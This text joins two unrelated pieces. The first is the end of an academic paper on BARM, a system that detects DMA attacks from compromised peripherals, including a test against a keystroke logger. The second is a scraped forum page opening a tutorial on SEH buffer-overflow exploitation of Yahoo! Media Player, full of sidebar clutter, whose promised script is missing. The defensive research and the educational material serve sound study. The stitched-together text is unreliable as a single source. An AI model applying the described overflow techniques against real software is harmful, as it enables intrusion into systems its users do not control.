Section 4.2). (ii) Calculate ACPUe by consideringAUHCI
e ,AFR
e,AME
e,AHD
e,
AETH
e,AV C
e, etc. that are determined by utilizing the difference of the stored
updated I/O statistics and the stored initial I/O statistics. Note, to facilitate
our implementation we assume AHD
e= 0,AETH
e = 0, etc. (iii) Compare ACPUm
andACPUe, report results and, if necessary, apply a defense mechanism.
Tolerance Value: For practicality we need to redefine how Aais calculated.
We useAato interpret the PMU measurements in our PoC implementation.
One reason is that PMU counters cannot be started/stopped simultaneously.
Very few processor cycles are needed to start/stop a counter and counters are
12 Patrick Stewin
started/stopped one after another. The same can occur in the very short amount
of time, where the counters are stopped to be read and to be reset (see time-
frame between step (iii) and step (ii) when permanently monitoring). Similar
inaccuracies can occur when reading I/O statistics logged by the OS. Hence, we
introduce the tolerance value T ∈Nand refineAa:
ATa={
0, if|Am−Ae|∈{0,···,T}
|Am−Ae|,if|Am−Ae|/∈{0,···,T}
The value ofTis a freely selectable number in terms of bus transactions
that BARM can tolerate when checking for additional bus traffic. Our evaluation
demonstrates that a useful Tis rather a small value (see Section 5). Nonetheless,
we have to consider that T>0 theoretically gives the attacker the chance to
hide the attack, i. e., to execute a transient attack. In the best case (see Figure 6)
the stealthy attack can have 2 Tbus transactions at most. It is very unlikely that
2Tbus transactions are enough for a successful attack. Data is most likely at a
different memory location after a platform reboot. Hence, the memory must be
scanned for valuable data and this requires a lot of bus transactions. Mechanisms
such as Address Space Layout Randomization (ASLR, [29, p.246ff.]) that are
applied by modern OSes can also complicate the search phase. This results in
additional bus transactions. Furthermore, the attacker needs to know the very
exact point in time when BARM must tolerate −Ttransactions.
?a= 0-? +?
2?Best Case for Attacker
Fig. 6. Tolerance Value T:If the attacker can predict the very exact moment where
BARM determines Ttoo little bus transactions, an attack with 2 Tbus transactions
could theoretically executed stealthily.
Identifying and Disabling the Malicious Peripheral: IfATa>0 BARM
has detected a DMA-based attack originating from a platform peripheral. It is
already of great value to know that such an attack is executed. A simple defense
policy that can be applied to stop an attack is to remove bus master capabilities
using the BME bit (see Section 4.1) of all non-trusted bus masters. On the one
hand, this policy will most probably stop certain platform functionalities from
working. On the other hand, it is reasonably to put a system, which has been
compromised via such a targeted attack, out of operation to examine it.
When stopping the non-trusted bus masters BARM places a notification for
the user on the platform’s screen. ATadoes not include any information about
what platform peripheral is performing the attack. To include that information in
the notification message, we implemented a simple peripheral test that identifies
Revealing Stealthy Peripheral-Based Attacks on Main Memory 13
the attacking peripheral. When the DMA attack is still scanning for valuable
data, we unset the BME bits of the non-trusted bus masters one after another
to reveal the attacking peripheral. After the bit is unset, BARM checks if the
additional bus activity vanished. If so, the attacking peripheral is identified and
the peripheral name is added to the attack notification message. If BARM still
detects additional bus activity the BME bit of the wrong peripheral is set again.
The OS must not trigger any I/O tasks during the peripheral test. Our evaluation
reveals that our test is performed in a few milliseconds, see Section 5. It is
required that the attack is a bit longer active than our peripheral test. Otherwise,
it cannot be guaranteed that our test identifies the attacking peripheral. The
DMA attack on a Linux system described in [4] needs between 1000 ms and
30,000 ms to scan the memory. Our evaluation demonstrates that BARM can
detect and stop a DMA attack much faster.
5 Evaluation of the Detection Model Implementation
We evaluated BARM, which is implemented as a Linux kernel module. First, we
conducted tests to determine a useful tolerance value T. In the main part of this
section, we present the performance overhead evaluation results of our solution.
We demonstrate that the overhead caused by BARM is negligible. Finally, we
conducted some experiments to evaluate how BARM behaves during an attack.
5.1 Tolerance Value T
We performed several different tests to detemine a useful tolerance value. We
repeated each test 100 times. Several different tests means, we evaluated BARM
with different PMU value sampling intervals (32 ms, 128 ms, 512 ms, 1024 ms,
2048 ms), number of CPU cores (1 −4 cores), RAM size (2 GB, 4 GB, 6 GB,
8 GB), platforms (Intel Q35 Desktop / Lenovo Thinkpads: T400, X200, X61s),
as well as minimum (powersave) and maximun (performance) CPU frequency to
check the impact for T.
Furthermore, we evaluated BARM with a CPU and with a memory stress
test. CPU stress test means, running the sha1sum command on a 100 MB test
file 100 times in parallel to ensure that the CPU utilization is 100 %. For the
memory stress test, we copied the 100 MB test file 2000 times from a main
memory location to another.
Our platforms had the following configurations: Q35 – Intel Core 2 Quad CPU
Q9650@3.00GHz with 4 GB RAM, T400 – Intel Core 2 Duo CPU P9600@2.66GHz
with 4 GB RAM, X200 – Intel Core 2 Duo CPU P8700@2.53GHz with 4 GB
RAM, and X61s – Intel Core 2 Duo CPU L7500@1.60GHz with 2 GB RAM.
We used a sampling interval of 32 ms, 1 core, 4 GB RAM, the Q35 platform,
and the maximum CPU frequency as basic evaluation configuration. We only
changed one of those properties per test. The results are summarized in Figure 7.
Note, to determine Twe considered up to five bus masters (1 – 2 CPU, 1
UHCI, 1 fingerprint reader, and 1 ME bus master). We used the SliTaz Linux
14 Patrick Stewin
distribution ( http://www.slitaz.org/ ) that allowed us to completely run the
Linux operating system from RAM. As a result we were able to selectively acti-
vate and deactivate different components as the harddisk controller bus master.
The overall test results reveal a worst case discrepancy between measured
and expected bus transactions of 19 (absolute value). This result confirms that
the measurement and evaluation of bus activity yields reliable values, i. e., values
without hardly any fluctuations. Nonetheless, to be on the safe side we work with
a tolerance value T= 50 when we evaluate BARM with a stealthy DMA-based
keystroke logger, see Section 5.3.
Discrepancy in
Number of
Bus Transactions
−20
−15
−10
−5
0
5
10
−20
−15
−10
−5
0
5
10
Sampling Interval in ms
32
128
512
1024
2048 
(a)
Discrepancy in
Number of
Bus Transactions
−20
−15
−10
−5
0
5
10
−20
−15
−10
−5
0
5
10
Number of CPU Cores
1
2
3
4 
(b)
Discrepancy in
Number of
Bus Transactions
−20
−15
−10
−5
0
5
10
−20
−15
−10
−5
0
5
10
CPU Frequency
MAX
MIN 
(c)
Discrepancy in
Number of
Bus Transactions
−20
−15
−10
−5
0
5
10
−20
−15
−10
−5
0
5
10
RAM Size in GB
2
4
6
8 
(d)
Discrepancy in
Number of
Bus Transactions
−20
−15
−10
−5
0
5
10
−20
−15
−10
−5
0
5
10
Test Platforms
Q35
T400
X200
X61s 
(e)
Discrepancy in
Number of
Bus Transactions
−20
−15
−10
−5
0
5
10
−20
−15
−10
−5
0
5
10
Stress Tests
CPU
MEM 
(f)
Fig. 7. Determining an Adequate Tolerance Value T:Figures (a) – (f) present
the discrepancy of Aacomputations when evaluating BARM with different tests.
BARM performed 100 runs on each test to determine Aa. With discrepancy we mean
the difference between the maximum and minimum Aavalue. Figures (a) – (f) visualize
the discrepancy in the form of boxplots. For each test the respective minimum, lower
quartile, median, upper quartile as well as maximum Aavalue is depicted. The small
point between minimum and maximum is the average Aavalue. TheAavalues range
mostly between−10 and 10. The highest absolute value is 19, see Figure (e) X61s.
5.2 Performance Overhead when Permanently Monitoring
Since BARM affects only the host CPU and the main memory directly, we
evaluated the performance overhead for those two resources. BARM does not
access the harddisk and the network card when monitoring.
We evaluated BARM on a 64 bit Ubuntu kernel (version 3.5.0-26). During
our tests we run the host CPU with maximum frequency thereby facilitating the
host CPU to cause as much bus activity as possible. Furthermore, we executed
our test with 1 CPU bus master as well as with 2 CPU bus masters to determine
if the number of CPU bus masters has any impact on the performance overhead.
Eventually, we need to use more processor registers (PMUs) with a second CPU
bus master. Another important point is the evaluation of the sampling interval.
Hence, we configured BARM with different intervals and checked the overhead.
Revealing Stealthy Peripheral-Based Attacks on Main Memory 15
To measure the overhead we used Time Stamp Counters (TSC, processor register
that counts clock cycles after a platform reset [25, Section 17.12]) for all our tests.
Relative
Overhead
0.95
0.96
0.97
0.98
0.99
1
1.01
1.02
1.03
1.04
1.05
0.95
0.96
0.97
0.98
0.99
1
1.01
1.02
1.03
1.04
1.05
MEM Benchmark
1 Core
4 Cores
BARM off (baseline)
BARM on
dummy
(a)
BARM off (baseline)
BARM on
Relative
Overhead
0.95
0.96
0.97
0.98
0.99
1
1.01
1.02
1.03
1.04
1.05
0.95
0.96
0.97
0.98
0.99
1
1.01
1.02
1.03
1.04
1.05
CPU Benchmark
1 Core
4 Cores
BARM off (baseline)
BARM on
dummy
(b)
BARM off (baseline)
BARM on
Relative
Overhead
0.95
0.96
0.97
0.98
0.99
1
1.01
1.02
1.03
1.04
1.05
0.95
0.96
0.97
0.98
0.99
1
1.01
1.02
1.03
1.04
1.05
MEM Benchmark
1 core
32ms (baseline) 
128ms
512ms 
1024ms
2048ms 
BARM off
(c)
Relative
Overhead
0.95
0.96
0.97
0.98
0.99
1
1.01
1.02
1.03
1.04
1.05
0.95
0.96
0.97
0.98
0.99
1
1.01
1.02
1.03
1.04
1.05
CPU Benchmark
1 Core
32ms (baseline) 
128ms
512ms 
1024ms
2048ms 
BARM off
(d)
Fig. 8. Host Performance CPU and MEM Overhead Evaluation: We measured
the overhead with a memory (MEM) and a CPU benchmark, each passed with 1 online
CPU core (1 CPU bus master) and 4 online CPU cores (2 CPU bus masters), see
Figure (a) and (b). At first, we performed the benchmarks without BARM to create a
baseline. Then, we repeated the benchmarks with BARM (sampling interval: 32 ms).
The results are represented as the relative overhead. The CPU benchmark did not
reveal any significant overhead. The MEM benchmark revealed an overhead of approx.
3.5 %. The number of online CPU cores/CPU bus masters has no impact regarding the
overhead. Furthermore, we checked the overhead when running BARM with different
sampling intervals, see Figure (c) and (d). Again, the CPU benchmark did not reveal
any overhead. The MEM benchmark results reveal that the overhead can be reduced
when choosing a longer sampling interval. A longer interval does not prevent BARM
from detecting a DMA attack. A longer interval canmean that the attacker caused
some damage before the attack is detected and stopped.
5.3 A Use Case to Demonstrate BARM’s Effectiveness
Even if we do not consider all platform bus masters in our presented PoC imple-
mention we can demonstrate the effectiveness of BARM. This is possible because
not all platform bus masters are needed for every sensitive application. For ex-
ample, when the user enters a password or other sensitive data, only the UHCI
controller and the CPU are required.
We evaluated BARM with password prompts on Linux. We set up an en-
vironment where four bus masters are active (2 CPU, 1 UHCI, and 1 ME bus
master) when using the sudo orsshcommand. BARM was started together with
thesudo orsshcommand and stopped when the password had been entered.
BARM stopped unneeded bus masters and restarted them immediately after
the password prompt had been passed. We attacked the password promt with
our DMA-based keystroke logger DAGGER, which is executed on Intel’s ME,
16 Patrick Stewin
Number of
Bus Transactions
0
200
400
600
800
1,000
1,200
Sampling in 32ms Steps
0
5
10
15
20
25
30
35
40
no DAGGER
DAGGER
Tolerance Value
DAGGER detected
DAGGER stopped
(a)
Number of
Bus Transactions
0
200
400
600
800
1,000
1,200
Sampling in 32ms Steps
0
5
10
15
20
25
30
35
40
no DAGGER
DAGGER
Tolerance Value
(b)
DAGGER
detected
DAGGER
stopped
(c)
Fig. 9. Evaluating BARM with Password Prompts ( sshcommand) and at
an Arbitrary Point during Runtime: BARM checks for additional bus activity Aa
every 32 ms (sampling interval). Aais found if the measured value is above the tolerance
valueT= 50. When the platform is not attacked the values are below T, see Figure (a)
and (b) “no DAGGER”. Figure (a) depicts an attack where DAGGER is already
waiting for the user password. BARM detects DAGGER with the first measurement
and stops it almost immediately. Figure (b) presents DAGGER’s attempt to attack
the platform at an arbitrary point during runtime with a similar result. Figure (c) is
the kernel log generated by BARM during the attack attempt presented in Figure (b).
see [4]. DAGGER scans the main memory via DMA for the physical address of
the keyboard buffer, which is also monitored via DMA.
Figure 9 (a) visualizes the measurements taken by BARM when the platform
is under attack. Under attack means that DAGGER is already loaded when the
user is asked for the password. Figure 9 (b) depicts the results of BARM when
the platform is attacked at an arbitrary point during runtime. For comparison
Figure 9 (a) and (b) also visualize BARM’s measurements when the platform
is not attacked. Figure 9 (c) is a fraction of the kernel log, which confirms how
fast BARM stopped DAGGER. BARM detected the DMA attack at time stamp
350.401,045 s. At time stamp 350 .465,042 s BARM identified the attacking DMA-
based peripheral. This test confirms that BARM can even detect attacks before
the attacker does damage. BARM stopped the attack when the keystroke logger
was still in the search phase. That means, the keystroke logger did not find the
keyboard buffer. Hence, the attacker was unable to capture any keystrokes.
We configured BARM with a PMU value sampling interval of 32 ms. Our
evaluation revealed that the attacker already generated more than 1000 memory
transactions in that time period. That means, that we could have chosen even a
significantly higher tolerance value than T= 50.
6 Related Work
We focus on previous work that is related to attacks originating from peripherals.
The Trusted Computing Group proposed to attest the peripheral’s firmware
at load time [30]. This does not prevent runtime attacks and it is not ensured
that the host CPU is able to access all ROM components of a peripheral. Other
attestation approaches were presented in [11, 31], for example. They are based on
latency-based attestation, i. e., a peripheral needs not only to compute a correct
checksum value. It also has to compute the value in a limited amount of time.
Revealing Stealthy Peripheral-Based Attacks on Main Memory 17
A compromised peripheral is revealed if either the checksum value is wrong
or if the checksum computation took too much time. Latency-based attestation
approaches require modifying the peripheral’s firmware and the host needs to
know the exact hardware configuration of the peripheral to be able to attest it.
The authors of [11] also state that their approach does not work correctly when
peripherals cause heavy bus traffic. They considered only one peripheral in their
evaluation. Furthermore, [32] revealed serious issues in attestation approaches
as presented in [11]. It is also unclear to what extent latency-based attestation
can prevent transient attacks. BARM’s monitoring strategy considers transient
attacks.
On the one hand, BARM can be implemented with less effort and without de-
tailed knowledge of the inner workings of the peripheral’s firmware and hardware
compared to latency-based attestation approaches. On the other hand, BARM is
unable to detect a man-in-the-middle attack implemented in the network card,
for example. We excluded such attacks in our trust and adversary model (see
Section 2). Such attacks can be prevented by applying end-to-end security in the
form of a trusted channel [33], for instance.
Another interesting approach is presented in [3]. NIC adapter-specific debug
features are used to monitor the firmware execution. Such features are not avail-
able for other peripherals. Another deficiency is the significant performance issue
for the host (100 % utilization of one CPU core).
To protect sensitive data such as cryptographic keys from memory attacks
several approaches were presented where sensitive data is only stored in processor
registers or in the cache and not in the main memory [34–37]. Unfortunately,
the authors of [38] demonstrated how to use a DMA-based attack to enforce the
host to leak the sensitive data into the main memory.
Sensitive data, which is stored in the main memory, could also be protected
by using an I/OMMU as proposed in [9, 39]. As already considered in our trust
and adversary model we do not count on I/OMMUs (see Section 2). An I/OMMU
must be configured flawlessly [11, p.2]. Additionally, it was demonstrated how
I/OMMUs can be succesfully attacked [12–15]. Furthermore, I/OMMUs are not
applicable due to memory access policy conflicts [4] and they are not supported
by every chipset and OS. The authors of [40] further highlight the deficiencies
of I/OMMUs.
Further related works that use performance counters to detect malware exist,
see [41–43] for example. The focus of these works is malware that is executed on
the host CPU and not hidden in a peripheral that attacks the host via DMA.
7 Conclusions and Future Work
In this work we demonstrate that the host CPU is able to detect additional, i. e.,
stealthy and malicious main memory accesses that originate from compromised
peripherals. The basic idea is that the memory bus is a shared resource that
the attacker cannot circumvent to attack the platform’s main memory. This is
the attacker’s Achilles’ heel that we exploit for our novel detection method. We
18 Patrick Stewin
compare the expected bus activity, which is known by the system software, with
the actual bus activity. The actual bus activity can be monitored due to the
fact that the bus is a shared resource. We developed the PoC implementation
BARM and evaluated our method with up to five bus masters considering the
most important bus systems (PCIe, FSB, memory bus) of a modern computer
platform. BARM can also identify the specific attacking peripheral and disable
it before the device causes any damage.
Since the host CPU can detect DMA attacks, we conclude that the host
CPU can successfully defend itself without any firmware and hardware mod-
ifications. The platform user does not have to rely on preventive mechanisms
such as I/OMMUs. We chose to implement a runtime monitoring strategy that
permanently monitors bus activity. Our monitoring strategy prevents transient
attacks and our evaluation demonstrates that the performance overhead is negli-
gible. Hence, we further conclude, that our method can be deployed in practice.
The integration of further bus masters into BARM as well as the evaluation of
the integrated masters are left to future work. We also plan to further examine
and improve timing-based methods for our general detection model to detect
malicious bus activity.
Acknowledgements. We would like to thank Dirk Kuhlmann and Chris Dal-
ton from HP Labs Bristol for motivating discussions that initiated this work
in the context of the Trust Domains project. We extend our thanks to SecT,
especially to Dmitry Nedospasov and Jean-Pierre Seifert. Specifically, we thank
Collin Mulliner for his advice about all areas as well as the anonymous reviewers
for their helpful suggestions and valuable comments.
References
1. G. Delugr ́ e. Closer to metal: Reverse engineering the Broadcom NetExtreme’s
firmware. Sogeti ESEC Lab: http://esec-lab.sogeti.com/dotclear/public/
publications/10-hack.lu-nicreverse_slides.pdf , 2010.
2. G. Delugr ́ e. How to develop a rootkit for Broadcom NetExtreme network cards. So-
geti ESEC Lab: http://esec-lab.sogeti.com/dotclear/public/publications/
11-recon-nicreverse_slides.pdf , 2011.
3. L. Duflot, Y. Perez, and B. Morin. What if you can’t trust your network card? In
Recent Advances in Intrusion Detection , pages 378–397, 2011.
4. P. Stewin and I. Bystrov. Understanding dma malware. In Proceedings of the 9th
Conference on Detection of Intrusions, Malware & Vulnerability Assessment , 2012.
5. A. Triulzi. Project Maux Mk.II. The Alchemist Owl: http://www.alchemistowl.
org/arrigo/Papers/Arrigo-Triulzi-PACSEC08-Project-Maux-II.pdf , 2008.
6. A. Triulzi. The Jedi Packet Trick takes over the Deathstar.
The Alchemist Owl: http://www.alchemistowl.org/arrigo/Papers/
Arrigo-Triulzi-CANSEC10-Project-Maux-III.pdf , 2010.
7. R. Breuk and A. Spruyt. Integrating DMA attacks in Metasploit. Sebug: http:
//sebug.net/paper/Meeting-Documents/hitbsecconf2012ams/D2%20SIGINT%
20-%20Rory%20Breuk%20and%20Albert%20Spruyt%20-%20Integrating%20DMA%
20Attacks%20in%20Metasploit.pdf , 2012.
Revealing Stealthy Peripheral-Based Attacks on Main Memory 19
8. R. Breuk and A. Spruyt. Integrating DMA attacks in exploitation frameworks.
Faculty of Science, University of Amsterdam: http://staff.science.uva.nl/
~delaat/rp/2011-2012/p14/report.pdf , 2012.
9. L. Duflot, Y. Perez, G. Valadon, and O. Levillain. Can you still trust your network
card? http://www.ssi.gouv.fr/IMG/pdf/csw-trustnetworkcard.pdf , 2010.
10. D. Abramson, J. Jackson, S. Muthrasanallur, G. Neiger, G. Regnier, R. Sankaran,
I. Schoinas, R. Uhlig, B. Vembu, and J. Wiegert. Intel Virtualization Technology
for Directed I/O. Intel Technology Journal , 10(3):179 –192, 2006.
11. Y. Li, J. McCune, and A. Perrig. VIPER: Verifying the integrity of peripherals’
firmware. In Proceedings of the ACM Conference on Computer and Communica-
tions Security , 2011.
12. F.L. Sang, E. Lacombe, V. Nicomette, and Y. Deswarte. Exploiting an I/OMMU
vulnerability. In Malicious and Unwanted Software , pages 7–14, 2010.
13. R. Wojtczuk, J. Rutkowska, and A. Tereshkin. Another Way to Circumvent
Intel Trusted Execution Technology. ITL: http://invisiblethingslab.com/
resources/misc09/Another%20TXT%20Attack.pdf , 2009.
14. R. Wojtczuk and J. Rutkowska. Following the White Rabbit: Software at-
tacks against Intel VT-d technology. ITL: http://www.invisiblethingslab.com/
resources/2011/Software%20Attacks%20on%20Intel%20VT-d.pdf , 2011.
15. R. Wojtczuk and J. Rutkowska. Attacking Intel TXT via SINIT code exe-
cution hijacking. ITL: http://www.invisiblethingslab.com/resources/2011/
Attacking_Intel_TXT_via_SINIT_hijacking.pdf , 2011.
16. L. Duflot, Y. Perez, and B. Morin. Run-time firmware integrity verification: what
if you can’t trust your network card? FNISA: http://www.ssi.gouv.fr/IMG/pdf/
Duflot-Perez_runtime-firmware-integrity-verification.pdf , 2011.
17. P. Stewin, J.-P. Seifert, and C. Mulliner. Poster: Towards Detecting DMA Malware.
InProceedings of the 18th ACM Conference on Computer and Communications
Security , pages 857–860, New York, NY, USA, 2011. ACM.
18. B. Buchanan. Computer Busses . Electronics & Electrical. Taylor & Francis, 2010.
19. R. Budruk, D. Anderson, and T. Shanley. Pci Express System Architecture . PC
System Architecture Series. Addison-Wesley, 2004.
20. John L. Hennessy and David A. Patterson. Computer Architecture: A Quantitative
Approach . Morgan Kaufmann, 2005. 3rd edition.
21. Intel Corporation. Intel 3 Series Express Chipset Family. Intel Corporation: http:
//www.intel.com/Assets/PDF/datasheet/316966.pdf , 2007.
22. Intel Corporation. Intel I/O Controller Hub (ICH9) Family. In-
tel Corporation: http://www.intel.com/content/dam/doc/datasheet/
io-controller-hub-9-datasheet.pdf , 2008.
23. D. Abbott. PCI Bus Demystified . Demystifying technology series. Elsevier, 2004.
24. D. Anderson and T. Shanley. Pci System Architecture . PC System Architecture
Series. Addison-Wesley, 1999.
25. Intel Corporation. Intel 64 and IA-32 Architectures Software Developer’s Manual
— Volume 3 (3A, 3B & 3C): System Programming Guide. Intel Corporation:
http://www.intel.com/Assets/PDF/datasheet/316966.pdf , March 2012.
26. J. Reinders. VTune Performance Analyzer Essentials: Measurement and Tuning
Techniques for Software Developers . Engineer to Engineer Series. Intel Press, 2005.
27. Intel Corporation. Intel VTune Amplifier 2013. Intel Corporation:
http://software.intel.com/sites/products/documentation/doclib/stdxe/
2013/amplifierxe/lin/ug_docs/index.htm , 2013.
20 Patrick Stewin
28. Intel Corporation. Universal Host Controller Interface (UHCI) Design Guide. The
Slackware Linux Project: ftp://ftp.slackware.com/pub/netwinder/pub/misc/
docs/29765002-usb-uhci%20design%20guide.pdf , 1996. Revision 1.1.
29. M. E. Russinovich, D. A. Solomon, and A. Ionescu. Windows Internals 6th Edition,
Part 2 . Microsoft Press, 2012.
30. Trusted Computing Group. TCG PC Client Specific Impementation Specifica-
tion For Conventional BIOS. TCG: http://www.trustedcomputinggroup.
org/files/temp/64505409-1D09-3519-AD5C611FAD3F799B/
PCClientImplementationforBIOS.pdf , 2005.
31. Y. Li, J. McCune, and A. Perrig. Sbap: software-based attestation for peripher-
als. In Proceedings of the 3rd international conference on Trust and trustworthy
computing , pages 16–29, Berlin, Heidelberg, 2010. Springer-Verlag.
32. Q. Nguyen. Issues in Software-based Attestation. Kaspersky Lab: http://www.
kaspersky.com/images/Quan%20Nguyen.pdf , 2012.
33. Y. Gasmi, A.-R. Sadeghi, P. Stewin, M. Unger, and N. Asokan. Beyond secure
channels. In Proceedings of the 2007 ACM workshop on Scalable trusted computing ,
pages 30–40, New York, NY, USA, 2007. ACM.
34. T. M ̈ uller, A. Dewald, and F. C. Freiling. Aesse: a cold-boot resistant implemen-
tation of aes. In Proceedings of the Third European Workshop on System Security ,
pages 42–47, New York, NY, USA, 2010. ACM.
35. T. M ̈ uller, Felix C. Freiling, and A. Dewald. Tresor runs encryption securely outside
ram. In Proceedings of the 20th USENIX conference on Security , pages 17–17,
Berkeley, CA, USA, 2011. USENIX Association.
36. P. Simmons. Security through amnesia: a software-based solution to the cold boot
attack on disk encryption. In Proceedings of the 27th Annual Computer Security
Applications Conference , pages 73–82, New York, NY, USA, 2011. ACM.
37. A. Vasudevan, J. McCune, J. Newsome, A. Perrig, and L. van Doorn. Carma:
a hardware tamper-resistant isolated execution environment on commodity x86
platforms. In Proceedings of the 7th ACM Symposium on Information, Computer
and Communications Security , pages 48–49, New York, NY, USA, 2012. ACM.
38. E. Blass and W. Robertson. Tresor-hunt: attacking cpu-bound encryption. In
Proceedings of the 28th Annual Computer Security Applications Conference , pages
71–78, New York, NY, USA, 2012. ACM.
39. T. M ̈ uller, B. Taubmann, and F. C. Freiling. Trevisor: Os-independent software-
based full disk encryption secure against main memory attacks. In Proceedings of
the 10th international conference on Applied Cryptography and Network Security ,
pages 66–83, Berlin, Heidelberg, 2012. Springer-Verlag.
40. F.L. Sang, V. Nicomette, and Y. Deswarte. I/O Attacks in Intel-PC Archi-
tectures and Countermeasures. SysSec: http://www.syssec-project.eu/media/
page-media/23/syssec2011-s1.4-sang.pdf , 2011.
41. Georg Wicherski. Taming ROP on Sandy Bridge. SyScan: http://www.syscan.
org/index.php/download , 2013.
42. Yubin Xia, Yutao Liu, Haibo Chen, and Binyu Zang. Cfimon: Detecting viola-
tion of control flow integrity using performance counters. In Proceedings of the
2012 42nd Annual IEEE/IFIP International Conference on Dependable Systems
and Networks (DSN) , DSN ’12, pages 1–12, Washington, DC, USA, 2012. IEEE
Computer Society.
43. Corey Malone, Mohamed Zahran, and Ramesh Karri. Are hardware performance
counters a cost effective way for integrity checking of programs. In Proceedings
of the sixth ACM workshop on Scalable trusted computing , STC ’11, pages 71–76,
New York, NY, USA, 2011. ACM. 
Latest AdditionsTutorial: SEHBased Exploits andthe DevelopmentProcessMay 2010 FreeGiveaway Sponsor- eLearnSecurityReview:eLearnSecurity’sPenetration TestingPro (PTP)March 2010 FreeGiveaway Winners- OffensiveSecurityMiracle on Thirty-Hack Street -Answers andWinnersApril 2010 FreeGiveaway Sponsor- CBT NuggetsReview: CEH iClassby EC-CouncilBook Review:Hacking forDummies 3rd EdFeb 2010 FreeGiveaway Winners- SyngressPublishingFinal Course andExam Review: PenTesting withBackTrackInterview: JoeMcCray ofLearnSecurityOnlineSSHliders -AnswersJan 2010 FreeGiveaway Winner -Black Hat DCEH-Net January2010 NewsletterInterview: FerruhMavituna onNetsparker EH-Net LoginWelcome Guest.Username:Password:
 Remember meLoginLost Password?No account yet? RegisterWho's OnlineWe have 22 guests and 2members onlineEH-Net News FeedsLatest Additions
Book Recommendations
 
 (8)
Home
Calendar
Certifications
Columns
Features
Forum
Resources
Vitals
 search...
You are here: HomeTutorial: SEH Based Exploits and the Development Process
Tutorial by Mark Nicholls AKA n1pThe intent of this exploit tutorial is to educate the reader on the use and understanding of vulnerabilitiesand exploit development. This will hopefully enable readers to gain a better understanding of the use ofexploitation tools and what goes on underneath to more accurately assess the risk of discoveredvulnerabilities in a computer environment. It is important for security consultants and ethical hackers tounderstand how buffer overflows actually work, as having such knowledge will improve penetrationtesting capabilities. It will also give you the tools to more accurately assess the risk of vulnerabilitiesand develop effective countermeasures for exploits doing the rounds in the wild.With this in, I am going to focus exclusively on the practical skills needed to exploit StructuredException Handler buffer overflows. I won't go into too much detail regarding the theory of how theywork, or how buffer overflows can be discovered. There are many other resources available on thissubject, and I encourage you to research this furtherWarning! Please note that this tutorial is intended for educational purposes only, and skills gained here should NOT be used toattack any system for which you don't have permission to access. It is illegal.
 del.icio.usDiscuss in ForumsBrief Intro to Structured Exception Handlers (SEH)An exception handler is a piece of code that is written inside an application with the purpose of dealing with cleanup activities when theapplication throws an exception error.  A typical exception handler looks like this:try {line = console.readLine();} catch {(Exception e) {console.printLine("Error: " + e.message());           }}When no exception handlers have been coded by a developer, there is a default Structured Exception Handler that is used to handleexceptions within Windows programs. Every process has an OS supplied SEH, and when a Windows program has an exception that itcannot handle itself, control is passed to a SEH address that has code that can be used to show a dialog box explaining that theprogram has crashed. As seen below:http://msdn.microsoft.com/en-us/library/ms679270%28v=VS.85%29.aspxhttp://www.microsoft.com/msj/0197/exception/exception.aspx
 
This default handler is seen at 0xFFFFFF and viewable in a debugger as such in the Stack window below. This is the end of the StackChain and should always be hit if the program cannot successfully handle crashes.
 
The SEH chain is essentially a linked list that is laid out in a structure similar to the chain below with the default OS handler at the end. PollsBest Career Move in2010:
Pass a Cert Exam
Course (In-Person)
Course (Online)
Get a Degree (Bach,Masters, PhD)
Publish Book orArticle
Teach / Instruct
Gain MoreExperience
No $$$ = Stay Put& Use FreeResourcesVote   ResultsSupport EH-Net
Help Support EH-Net withOur Amazon Store
Try CBT Nuggets Free!Recent Forum Topics
 WebApplications :Jarlsberg ByGoogle (2) byEquix3n-
 Network PenTesting : HackingContest by OffSec(46) by Equix3n-
 CEH -Certified EthicalHacker : CEH Cert(20) by smithdyer
 Other : Anycomments orRecommendationon These Books ?(6) by smithdyer
 GeneralCertification :CERT questions(4) by Equix3n-
 /root :[Article]-Tutorial:SEH BasedExploits and theDevelopmentProcess (7) byAnquilas
 WebApplications :Web filtering (3)by pizza1337
 Programming: Can this beexploitable? (6)by Ketchup
 Network PenTesting :PenetrationTesting in theReal World (9) bymtgarden
 Network Pen
 
Each code block has its own stack frame, and the pointer to the exception handler is part of this stack frame.  Information about theexception handler is stored in an exception_registration structure on the stack. Each record then has the following info:• A pointer to the next SEH record• Pointer to address of the exception handler (SE Handler)Ok, that’s enough theory. References are provided at the end for further reading and learning. On to the practical stuff...Choosing the TargetThe target chosen is the Yahoo! Media Player. It has a known SEH overflow vulnerability. The best way to learn about exploiting suchholes is to search for an application on a site like ExploitDB or Milw0rm. The available exploits will provide information as to whetherthey are remote, stack or seh type overflows that lead to crash / DOS / code execution. Rather than looking at the exploit code, Idownload the software and attempt to exploit it with only the type of vulnerability being known to me.This provides a more realistic scenario and allows me to create the exploit from scratch, whilst also avoiding the time consuming task offuzzing a dead end. If you do get stuck, then the exploit code is there for some hints. However, the code available may also not work orbe complete. This is usually done to prevent script kiddies from copying code directly.  Additionally, the code may not work due tochanges in the OS, such as an update, service pack, etc. This provides a more challenging task to those that want to learn about exploitdevelopment, and, as a result, it can be more rewarding when a correct exploit is generated.A quick search for “exploitdb movie player” returns a hit that provides enough information to progress with – Yahoo Player v1.0(.m3u/.pls/.ypl) Buffer Overflow (SEH) (This may change). So with simple inference, we know that we have a target that incorrectlyhandles playlist files and results in a SEH overflow. So, let’s begin.
 Crashing the Media PlayerWhen performing a regular stack-based buffer overflow, we overwrite the return address (EIP) and make the application jump to ourshellcode.  When doing a SEH overflow, we will continue overwriting the stack after overwriting EIP, so we can overwrite the defaultexception handler as well. This will provide the launch pad into our shellcode that will simply launch the Windows Calculator.Using python (or language of choice), we can create a script to generate files that will hopefully crash the application. Firstly, we createthe script below that will generate a “.m3u” playlist file. In this file a number of ‘\x41’ characters (‘A’ in hex) will be placed. The purposeof this is to show us where our file gets loaded in memory. With a successful overflow, a large amount of ‘\x41’ characters will be visiblein registers or, in this case, exception handlers. The script is below:
 
Using this, we create files with increments of 1000 ‘A’ characters and continue this until a crash. Using an offset we are met with thedefault Windows error handler and... Voila... the program crashes. To investigate further attach a debugger (OllyDBG/Immunity). To dothis either run the program and attach it to the process, let it breakpoint and then hit run. Alternatively just open it as an executablefrom the debugger menu.
 Network PenTesting :UploadingExecutables whenUploading isnt anOption (5) bybamed
 Book Reviews: [Article]-BookReview: Hackingfor Dummies 3rdEd (6) by chrisj
 Other : Howto become theworld's no.1hacker? (6) bychrisj
 News Itemsand GeneralDiscussion AboutEH-Net : How didyou get intohacking? (14) byzeroflaw
 Malware :Malicious GoogleGadgets in Action(0) by Equix3n-
 Wireless :WPA/WPA2wordlist. (0) byjonas
